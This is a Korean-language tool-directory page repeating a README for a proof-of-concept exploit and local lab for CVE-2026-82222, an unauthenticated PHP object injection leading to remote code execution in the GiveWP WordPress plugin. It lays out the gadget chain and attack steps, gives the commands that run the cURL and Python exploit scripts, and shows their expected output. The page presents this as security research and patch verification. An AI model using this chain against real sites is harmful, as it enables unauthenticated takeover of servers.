Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-82222-PoC — CVE-2026-82222에 대한 개념 증명 및 로컬 DDEV 랩으로, GiveWP WordPress 플러그인의 인증되지 않은 PHP 객체 주입을 통한 RCE 취약점이며, cURL 및 Python 익스플로잇 스크립트를 포함합니다. | Kitploit
도구/GitHubGitHub/sajjadsiam/cve-2026-82222-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & EducationRemote Access ToolPayload DevelopmentLabs & Practice
GitHubsajjadsiam/cve-2026-82222-poc

CVE-2026-82222-PoC

CVE-2026-82222에 대한 개념 증명 및 로컬 DDEV 랩으로, GiveWP WordPress 플러그인의 인증되지 않은 PHP 객체 주입을 통한 RCE 취약점이며, cURL 및 Python 익스플로잇 스크립트를 포함합니다.

2일 전아직 검토되지 않음
저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-82222 — GiveWP 인증되지 않은 PHP 객체 주입 → RCE

CVE-2026-82222에 대한 랩 + 개념 증명: GiveWP WordPress 기부 플러그인 <= 4.16.7.1에서 인증되지 않은 PHP 객체 주입으로 인한 원격 코드 실행(4.16.7.2에서 패치됨).

CVECVE-2026-82222
CVSS10.0 (치명적)
CWECWE-502 — 신뢰할 수 없는 데이터의 역직렬화
영향받는 버전GiveWP (기부 플러그인) <= 4.16.7.1
패치 버전4.16.7.2
권고Patchstack

승인된 테스트 전용. 이 저장소는 교육, 취약점 연구 및 본인이 소유하거나 명시적으로 테스트가 허용된 시스템을 테스트하기 위한 것입니다. 무단 사용은 불법입니다.

목적

이 저장소는 보안 전문가들이 CVE-2026-82222를 이해하고, 탐지하며, 방어할 수 있도록 돕기 위해 존재합니다. 모든 시연은 본인 컴퓨터에서 실행하는 로컬 랩(lab/)을 위해 설계되었습니다. PoC는 디스크에 아무것도 쓰지 않고 플러그인 설정도 변경하지 않습니다 — 명령 출력은 트리거 요청의 HTTP 응답에만 실려 나옵니다. 전체 범위와 신고 정책은 SECURITY.md를 참조하세요.

저장소 구조

root@kitploit:~
├── lab/                    # DDEV + WordPress + GiveWP 4.16.5.1 취약 랩
│   ├── setup.sh            # 한 명령으로 랩 구축
│   ├── set-givewp-version.sh   # 취약/패치된 GiveWP 버전 전환
│   ├── .ddev/config.yaml   # DDEV 프로젝트 설정
│   └── README.md
├── poc/
│   ├── cve-2026-82222.sh   # cURL 익스플로잇 스크립트
│   ├── poc.py              # Python 익스플로잇 스크립트
│   └── requirements.txt
├── docs/
│   ├── ANALYSIS.md         # 기술 분석 + 도달 가능성 매트릭스
│   ├── BURP-MANUAL.md      # Burp Repeater 워크스루 (요청/응답)
│   └── CURL-POC.md         # 복사/붙여넣기 cURL 워크스루
├── SECURITY.md             # 범위, 신고 및 안전 사용 정책
└── LICENSE

취약점

인증되지 않은 네 개의 요청과 하나의 트리거:

  1. 등록 — GiveWP의 자체 등록 핸들러가 users_can_register를 무시하고 인증된 WP 쿠키를 발급합니다.
  2. 심기 — 직렬화된 POP 체인(TCPDF → Symfony Session → DonorFactory → system)을 계정의 last_name 메타 필드에 저장합니다.
  3. 오염 — give_last 없이 기부를 제출합니다. GiveWP는 DB에서 이름을 채우고, allowed_classes=false로 가젯을 역직렬화하며, 살아있는 객체 그래프를 wp_give_sessions에 직렬화합니다.
  4. 트리거 — 하나의 요청이 제한 없는 unserialize()로 세션을 다시 읽습니다. TCPDF::__destruct()가 call_user_func_array('system', [cmd])에 도달합니다. 출력은 HTTP 응답에 나타나며 — 디스크에는 아무것도 쓰이지 않습니다.

전체 세부 사항: docs/ANALYSIS.md

빠른 시작

1. 랩 구축

root@kitploit:~
cd lab
bash setup.sh
# -> https://cve-2026-82222.ddev.site
#    form id printed at the end, gateway: manual, WP admin: admin/<random>

Docker + DDEV가 필요합니다.

2. PoC 실행

root@kitploit:~
cd poc
pip install -r requirements.txt

# cURL
bash cve-2026-82222.sh https://cve-2026-82222.ddev.site id <FORM_ID>

# Python
python3 poc.py https://cve-2026-82222.ddev.site <FORM_ID> -c id -g manual -a 10.00 -v

# fingerprint only (no exploitation)
python3 poc.py https://cve-2026-82222.ddev.site --check

두 PoC 모두 설계상 단일 대상입니다 — 배치 또는 대량 스캔 모드는 없습니다. lab/의 랩이나 테스트 권한이 있는 시스템에만 실행하세요.

예상 성공 출력 (명령 id):

root@kitploit:~
[*] CVE-2026-82222 kill chain on https://cve-2026-82222.ddev.site (form 5)
[*] 1/5 Registering cve_1b290e (GiveWP ignores users_can_register) ...
      -> HTTP 302
[+] auth cookie obtained
[*] 2/5 Fetching profile nonce ...
[+] nonce=a0fd84c9d7 user_id=7
[*] 3/5 Building POP gadget for command: id
[*] 4/5 Storing gadget in wp_usermeta.last_name ...
      -> HTTP 302
[+] gadget planted
[*] 5/5 Poisoning wp_give_sessions (HTTP 500 is expected) ...
      -> HTTP 500
[+] session poisoned
[*] Triggering RCE ...
[+] COMMAND OUTPUT (id) from /?give_action=view_receipt :

uid=501(sajjadsiam) gid=20(dialout) groups=20(dialout)

3. 패치 확인

root@kitploit:~
cd lab
bash set-givewp-version.sh 4.16.7.2    # patched build
cd ../poc
python3 poc.py https://cve-2026-82222.ddev.site <FORM_ID> -c id -v
# -> chain dies; no output

도달 가능성

GiveWP상태
<= 4.16.5.1취약 — 기본 설치가 완전히 도달 가능
4.16.6 – 4.16.7.1취약 — 레거시(비 V3) 폼 필요; 등록에 give_register_nonce 필요
4.16.7.2패치됨

면책 조항

이 저장소는 교육 및 방어적 보안 연구 목적으로만 제공됩니다. 포함된 코드는 문서화된 취약점을 시연하여 방어자가 탐지를 구축하고, 패치를 검증하며, 자체 시스템을 테스트할 수 있도록 합니다.

저자는 이 자료로 인한 오용이나 손해에 대해 책임지지 않습니다. 명시적 승인 없이 어떤 시스템에도 사용하지 마세요 — 그렇게 하면 컴퓨터 사기 및 남용법(CFAA) 및 전 세계의 동등한 법률을 위반할 수 있습니다. SECURITY.md를 참조하세요.

크레딧

  • 취약점 연구 및 권고: Patchstack
  • PoC 체인은 로컬 DDEV 설치에서 GiveWP 4.16.5.1에 대해 검증 및 랩 구성됨.

라이선스

MIT — LICENSE를 참조하세요.

도구 다운로드